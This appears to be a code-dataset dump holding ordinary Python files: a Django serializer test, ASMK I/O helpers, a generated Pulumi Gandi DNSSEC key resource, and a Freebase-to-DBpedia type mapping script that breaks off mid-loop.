res = self.serializer.list_collaborators('repo_name')
self.assertEqual(expected_result, res)
def test_add_collaborator(self):
mock_add_collab = self.mock_manager.return_value.add_collaborator
mock_add_collab.return_value = True
res = self.serializer.add_collaborator('repo_name', 'collab', [], [])
self.assertTrue(mock_add_collab.called)
self.assertEqual(True, res)
def test_remove_collaborator(self):
mock_remove_collab = self.mock_manager.return_value.delete_collaborator
mock_remove_collab.return_value = True
res = self.serializer.remove_collaborator('repo_name', 'collab')
self.assertTrue(mock_remove_collab.called)
self.assertEqual(True, res) | src/api/test/test_collaborator_serializer.py | from mock import patch
from django.test import TestCase
from ..serializer import CollaboratorSerializer
class CollaboratorSerializerTests(TestCase):
"""Test RepoSerializer methods"""
def setUp(self):
self.username = "delete_me_username"
self.repo_base = "delete_me_repo_base"
self.password = "<PASSWORD>"
self.mock_manager = self.create_patch(
'api.serializer.DataHubManager')
self.mock_reverse = self.create_patch(
'api.serializer.reverse')
self.mock_reverse.return_value = ('mock_url')
self.serializer = CollaboratorSerializer(
username=self.username, repo_base=self.repo_base)
def create_patch(self, name):
# helper method for creating patches
patcher = patch(name)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def test_list_collaborators(self):
list_collab_result = [
{'username': 'collab1', 'privileges': 'UC'},
{'username': 'collab2', 'privileges': 'U'}]
mock_list_collabs = self.mock_manager.return_value.list_collaborators
mock_list_collabs.return_value = list_collab_result
expected_result = {'collaborators': [
{'username': 'collab1', 'href': 'mock_url'},
{'username': 'collab2', 'href': 'mock_url'}]}
res = self.serializer.list_collaborators('repo_name')
self.assertEqual(expected_result, res)
def test_add_collaborator(self):
mock_add_collab = self.mock_manager.return_value.add_collaborator
mock_add_collab.return_value = True
res = self.serializer.add_collaborator('repo_name', 'collab', [], [])
self.assertTrue(mock_add_collab.called)
self.assertEqual(True, res)
def test_remove_collaborator(self):
mock_remove_collab = self.mock_manager.return_value.delete_collaborator
mock_remove_collab.return_value = True
res = self.serializer.remove_collaborator('repo_name', 'collab')
self.assertTrue(mock_remove_collab.called)
self.assertEqual(True, res) | 0.584034 | 0.183502 |
import os.path
import time
import sys
import logging
import pickle
import urllib.request
from io import StringIO
from pathlib import Path
import yaml
import numpy as np
# Params
def load_params(path):
"""Return loaded parameters from a yaml file"""
with open(path, "r") as handle:
content = yaml.safe_load(handle)
if "__template__" in content:
# Treat template as defaults
template_path = os.path.expanduser(content.pop("__template__"))
template = load_params(os.path.join(os.path.dirname(path), template_path))
content = dict_deep_overlay(template, content)
return content
def dict_deep_overlay(defaults, params):
"""If defaults and params are both dictionaries, perform deep overlay (use params value for
keys defined in params, otherwise use defaults value)"""
if isinstance(defaults, dict) and isinstance(params, dict):
for key in params:
defaults[key] = dict_deep_overlay(defaults.get(key, None), params[key])
return defaults
return params
# Logging
def init_logger(log_path):
"""Return a logger instance which logs to stdout and, if log_path is not None, also to a file"""
logger = logging.getLogger("ASMK")
logger.setLevel(logging.DEBUG)
stdout_handler = logging.StreamHandler()
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(logging.Formatter('%(name)s %(levelname)s: %(message)s'))
logger.addHandler(stdout_handler)
if log_path:
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def progress(iterable, *, size=None, frequency=1, header=""):
"""Generator that wraps an iterable and prints progress"""
if size is None:
size = len(iterable)
header = f"{header.capitalize()}: " if header else ""
charsize = len(str(size))
if frequency:
print(f"{header}[{'0'.rjust(charsize)}/{size}]", end=" ")
sys.stdout.flush()
time0 = time.time()
for i, element in enumerate(iterable):
yield element
i1 = i+1
if frequency and (i1 % frequency == 0 or i1 == size):
avg_time = (time.time() - time0) / i1
print(f"\r{header}[{str(i1).rjust(charsize)}/{size}] " \
f"elapsed {int(avg_time*i1/60):02d}m/{int(avg_time*size/60):02d}m", end=" ")
sys.stdout.flush()
if frequency:
print()
def capture_stdout(func, logger):
"""Redirect stdout to logger"""
sys.stdout, stdout = StringIO(), sys.stdout
func()
sys.stdout, out_text = stdout, sys.stdout.getvalue()
for line in out_text.strip().split("\n"):
logger.info(line)
# Load and save state dicts
def load_pickle(path):
"""Load pickled data from path"""
with open(path, 'rb') as handle:
return pickle.load(handle)
def save_pickle(path, data):
"""Save data to path using pickle"""
with open(path, 'wb') as handle:
pickle.dump(data, handle)
# Download
def download_files(names, root_path, base_url, logfunc=None):
"""Download file names from given url to given directory path. If logfunc given, use it to log
status."""
root_path = Path(root_path)
for name in names:
path = root_path / name
if path.exists():
continue
if logfunc:
logfunc(f"Downloading file '{name}'")
path.parent.mkdir(parents=True, exist_ok=True)
urllib.request.urlretrieve(base_url + name, path)
# Iteration
def slice_unique(ids):
"""Generate slices that mark a sequence of identical values in a given array of ids. The
sequence must be uninterrupted (compact)."""
pointer = 0
for i, counts in zip(*np.unique(ids, return_counts=True)):
seq = slice(pointer, pointer+counts)
assert (ids[seq] == i).all()
yield i, seq
pointer += counts | asmk/io_helpers.py |
import os.path
import time
import sys
import logging
import pickle
import urllib.request
from io import StringIO
from pathlib import Path
import yaml
import numpy as np
# Params
def load_params(path):
"""Return loaded parameters from a yaml file"""
with open(path, "r") as handle:
content = yaml.safe_load(handle)
if "__template__" in content:
# Treat template as defaults
template_path = os.path.expanduser(content.pop("__template__"))
template = load_params(os.path.join(os.path.dirname(path), template_path))
content = dict_deep_overlay(template, content)
return content
def dict_deep_overlay(defaults, params):
"""If defaults and params are both dictionaries, perform deep overlay (use params value for
keys defined in params, otherwise use defaults value)"""
if isinstance(defaults, dict) and isinstance(params, dict):
for key in params:
defaults[key] = dict_deep_overlay(defaults.get(key, None), params[key])
return defaults
return params
# Logging
def init_logger(log_path):
"""Return a logger instance which logs to stdout and, if log_path is not None, also to a file"""
logger = logging.getLogger("ASMK")
logger.setLevel(logging.DEBUG)
stdout_handler = logging.StreamHandler()
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(logging.Formatter('%(name)s %(levelname)s: %(message)s'))
logger.addHandler(stdout_handler)
if log_path:
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s: %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def progress(iterable, *, size=None, frequency=1, header=""):
"""Generator that wraps an iterable and prints progress"""
if size is None:
size = len(iterable)
header = f"{header.capitalize()}: " if header else ""
charsize = len(str(size))
if frequency:
print(f"{header}[{'0'.rjust(charsize)}/{size}]", end=" ")
sys.stdout.flush()
time0 = time.time()
for i, element in enumerate(iterable):
yield element
i1 = i+1
if frequency and (i1 % frequency == 0 or i1 == size):
avg_time = (time.time() - time0) / i1
print(f"\r{header}[{str(i1).rjust(charsize)}/{size}] " \
f"elapsed {int(avg_time*i1/60):02d}m/{int(avg_time*size/60):02d}m", end=" ")
sys.stdout.flush()
if frequency:
print()
def capture_stdout(func, logger):
"""Redirect stdout to logger"""
sys.stdout, stdout = StringIO(), sys.stdout
func()
sys.stdout, out_text = stdout, sys.stdout.getvalue()
for line in out_text.strip().split("\n"):
logger.info(line)
# Load and save state dicts
def load_pickle(path):
"""Load pickled data from path"""
with open(path, 'rb') as handle:
return pickle.load(handle)
def save_pickle(path, data):
"""Save data to path using pickle"""
with open(path, 'wb') as handle:
pickle.dump(data, handle)
# Download
def download_files(names, root_path, base_url, logfunc=None):
"""Download file names from given url to given directory path. If logfunc given, use it to log
status."""
root_path = Path(root_path)
for name in names:
path = root_path / name
if path.exists():
continue
if logfunc:
logfunc(f"Downloading file '{name}'")
path.parent.mkdir(parents=True, exist_ok=True)
urllib.request.urlretrieve(base_url + name, path)
# Iteration
def slice_unique(ids):
"""Generate slices that mark a sequence of identical values in a given array of ids. The
sequence must be uninterrupted (compact)."""
pointer = 0
for i, counts in zip(*np.unique(ids, return_counts=True)):
seq = slice(pointer, pointer+counts)
assert (ids[seq] == i).all()
yield i, seq
pointer += counts | 0.478041 | 0.1585 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['KeyArgs', 'Key']
@pulumi.input_type
class KeyArgs:
def __init__(__self__, *,
domain: pulumi.Input[str]):
"""
The set of arguments for constructing a Key resource.
:param pulumi.Input[str] domain: Domain name
"""
pulumi.set(__self__, "domain", domain)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@pulumi.input_type
class _KeyState:
def __init__(__self__, *,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Key resources.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if algorithm_name is not None:
pulumi.set(__self__, "algorithm_name", algorithm_name)
if deleted is not None:
pulumi.set(__self__, "deleted", deleted)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if ds is not None:
pulumi.set(__self__, "ds", ds)
if flags is not None:
pulumi.set(__self__, "flags", flags)
if public_key is not None:
pulumi.set(__self__, "public_key", public_key)
if status is not None:
pulumi.set(__self__, "status", status)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def algorithm(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@algorithm.setter
def algorithm(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "algorithm", value)
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> Optional[pulumi.Input[str]]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@algorithm_name.setter
def algorithm_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "algorithm_name", value)
@property
@pulumi.getter
def deleted(self) -> Optional[pulumi.Input[bool]]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@deleted.setter
def deleted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deleted", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def ds(self) -> Optional[pulumi.Input[str]]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@ds.setter
def ds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ds", value)
@property
@pulumi.getter
def flags(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@flags.setter
def flags(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "flags", value)
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> Optional[pulumi.Input[str]]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@public_key.setter
def public_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_key", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[int]]:
"""
Tag
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tag", value)
class Key(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain: Domain name
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: KeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param KeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(KeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = KeyArgs.__new__(KeyArgs)
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["algorithm"] = None
__props__.__dict__["algorithm_name"] = None
__props__.__dict__["deleted"] = None
__props__.__dict__["ds"] = None
__props__.__dict__["flags"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["status"] = None
__props__.__dict__["tag"] = None
super(Key, __self__).__init__(
'gandi:livedns/key:Key',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None) -> 'Key':
"""
Get an existing Key resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _KeyState.__new__(_KeyState)
__props__.__dict__["algorithm"] = algorithm
__props__.__dict__["algorithm_name"] = algorithm_name
__props__.__dict__["deleted"] = deleted
__props__.__dict__["domain"] = domain
__props__.__dict__["ds"] = ds
__props__.__dict__["flags"] = flags
__props__.__dict__["public_key"] = public_key
__props__.__dict__["status"] = status
__props__.__dict__["tag"] = tag
return Key(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def algorithm(self) -> pulumi.Output[int]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> pulumi.Output[str]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@property
@pulumi.getter
def deleted(self) -> pulumi.Output[bool]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def ds(self) -> pulumi.Output[str]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@property
@pulumi.getter
def flags(self) -> pulumi.Output[int]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> pulumi.Output[str]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tag(self) -> pulumi.Output[int]:
"""
Tag
"""
return pulumi.get(self, "tag") | sdk/python/pulumi_gandi/livedns/key.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['KeyArgs', 'Key']
@pulumi.input_type
class KeyArgs:
def __init__(__self__, *,
domain: pulumi.Input[str]):
"""
The set of arguments for constructing a Key resource.
:param pulumi.Input[str] domain: Domain name
"""
pulumi.set(__self__, "domain", domain)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@pulumi.input_type
class _KeyState:
def __init__(__self__, *,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Key resources.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if algorithm_name is not None:
pulumi.set(__self__, "algorithm_name", algorithm_name)
if deleted is not None:
pulumi.set(__self__, "deleted", deleted)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if ds is not None:
pulumi.set(__self__, "ds", ds)
if flags is not None:
pulumi.set(__self__, "flags", flags)
if public_key is not None:
pulumi.set(__self__, "public_key", public_key)
if status is not None:
pulumi.set(__self__, "status", status)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def algorithm(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@algorithm.setter
def algorithm(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "algorithm", value)
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> Optional[pulumi.Input[str]]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@algorithm_name.setter
def algorithm_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "algorithm_name", value)
@property
@pulumi.getter
def deleted(self) -> Optional[pulumi.Input[bool]]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@deleted.setter
def deleted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deleted", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def ds(self) -> Optional[pulumi.Input[str]]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@ds.setter
def ds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ds", value)
@property
@pulumi.getter
def flags(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@flags.setter
def flags(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "flags", value)
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> Optional[pulumi.Input[str]]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@public_key.setter
def public_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_key", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[int]]:
"""
Tag
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tag", value)
class Key(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain: Domain name
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: KeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param KeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(KeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = KeyArgs.__new__(KeyArgs)
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["algorithm"] = None
__props__.__dict__["algorithm_name"] = None
__props__.__dict__["deleted"] = None
__props__.__dict__["ds"] = None
__props__.__dict__["flags"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["status"] = None
__props__.__dict__["tag"] = None
super(Key, __self__).__init__(
'gandi:livedns/key:Key',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None) -> 'Key':
"""
Get an existing Key resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _KeyState.__new__(_KeyState)
__props__.__dict__["algorithm"] = algorithm
__props__.__dict__["algorithm_name"] = algorithm_name
__props__.__dict__["deleted"] = deleted
__props__.__dict__["domain"] = domain
__props__.__dict__["ds"] = ds
__props__.__dict__["flags"] = flags
__props__.__dict__["public_key"] = public_key
__props__.__dict__["status"] = status
__props__.__dict__["tag"] = tag
return Key(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def algorithm(self) -> pulumi.Output[int]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> pulumi.Output[str]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@property
@pulumi.getter
def deleted(self) -> pulumi.Output[bool]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def ds(self) -> pulumi.Output[str]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@property
@pulumi.getter
def flags(self) -> pulumi.Output[int]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> pulumi.Output[str]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tag(self) -> pulumi.Output[int]:
"""
Tag
"""
return pulumi.get(self, "tag") | 0.855066 | 0.077169 |
from collections import defaultdict
import sys, csv, bz2, re
import rdflib
import getopt
#Read command line options
options, operands = getopt.getopt(sys.argv[4:], "", ["one_type_per_line"])
config = dict(options)
config.setdefault("one_type_per_line", False)
csv.field_size_limit(1000000000)
IGNORED_PREFIXES = ["/base/", "/user/", "/m/", "/common/topic", "/freebase",
"/influence", "/dataworld", "/common", "/type", "/atom"]
FREEBASE_RDF_PREFIX = "http://rdf.freebase.com/ns"
def filterTypes(freebase_type):
#Ignore domains, since domain equality for Freebase is defined within DBpedia Spotlight (FreebaseType.equals(...))
if freebase_type.count("/") < 2:
return False
#Ignore all of these prefixes:
for prefix in IGNORED_PREFIXES:
if freebase_type.startswith(prefix):
return False
return True
def getSubjectAndObject(line, predicate, safe=True):
if safe:
g = rdflib.Graph()
g.parse(data=line, format="nt")
subject = g.subjects().next()
object = g.objects().next()
return subject, object
else:
r = re.search("<(.*)> <" + predicate + "> <(.*)>.*", line)
if r is not None :
subject = r.group(1)
object = r.group(2)
return subject, object
else:
#E.g.:<http://en.wikipedia.org/wiki/AfroAsiaticLanguages> <http://dbpedia.org/ontology/wikiPageID> "40"^^<http://www.w3.org/2001/XMLSchema#integer> .
r = re.search("<(.*)> <" + predicate + "> \"(.*)\".*", line)
if r is not None :
subject = r.group(1)
object = r.group(2)
return subject, object
def addToDictionary(ntfile, dictionary, predicate, label=None, safe=True, objects_as_list=False, reverse=False, sfunc=str, ofunc=str):
if ntfile.endswith(".bz2"):
f = bz2.BZ2File(ntfile)
else:
f = open(ntfile)
i = 0
for next in f:
i += 1
if next is None or next == "":
break
try:
if reverse:
object, subject = getSubjectAndObject(next, predicate, safe=safe)
else:
subject, object = getSubjectAndObject(next, predicate, safe=safe)
except TypeError:
continue
subject = sfunc(subject)
if subject not in dictionary:
dictionary[subject] = {}
if objects_as_list:
if label not in dictionary[subject]:
dictionary[subject][label] = [object]
elif object not in dictionary[subject][label]:
dictionary[subject][label].append(object)
elif label is None:
dictionary[subject] = ofunc(object)
else:
dictionary[subject][label] = ofunc(object)
return dictionary
freebaseTypeDict = defaultdict(int)
def countFreebaseTypes(freebaseTypes):
#Extend the list of types with the base types but only count them once (list -> set)
freebaseTypesToCount = freebaseTypes[:]
freebaseTypesToCount.extend(set(map(lambda x: "/" + x.split("/")[1], freebaseTypes)))
for freebaseType in freebaseTypesToCount:
freebaseTypeDict[freebaseType] += 1
def main():
page_ids = sys.argv[1]
wiki_links = sys.argv[2]
freebase_dump = sys.argv[3]
outfile_types = "types.freebase.tsv"
outfile_freebase_identifier = "typestats.freebase.tsv"
print >>sys.stderr, "Reading Wikipedia id to Wikipedia page mapping..."
idToPage = addToDictionary(page_ids, {}, "http://dbpedia.org/ontology/wikiPageID", reverse=True, safe=False,
ofunc=lambda x: str(x).replace("http://en.wikipedia.org/wiki/", ""))
print >>sys.stderr, "Reading Wikipedia page to DBpedia mapping..."
pageToDBpedia = addToDictionary(wiki_links, {}, "http://xmlns.com/foaf/0.1/primaryTopic", safe=False,
sfunc=lambda x: str(x).replace("http://en.wikipedia.org/wiki/", ""),
ofunc=lambda x: str(x).replace("http://dbpedia.org/resource/", ""))
freebaseReader = csv.reader(bz2.BZ2File(freebase_dump), delimiter='\t')
#freebaseTypes = {}
print >>sys.stderr, "Processing Freebase dump..."
typeWriter = csv.writer(open(outfile_types, "w"), delimiter='\t')
for row in freebaseReader:
if row[3].startswith("/wikipedia/en_"):
#There is a match with Wikipedia:
wikiID = row[3].replace("/wikipedia/en_id/", "")
try:
wikiPage = idToPage[wikiID]
dbpediaID = pageToDBpedia[wikiPage]
types = filter(filterTypes, row[4].split(","))
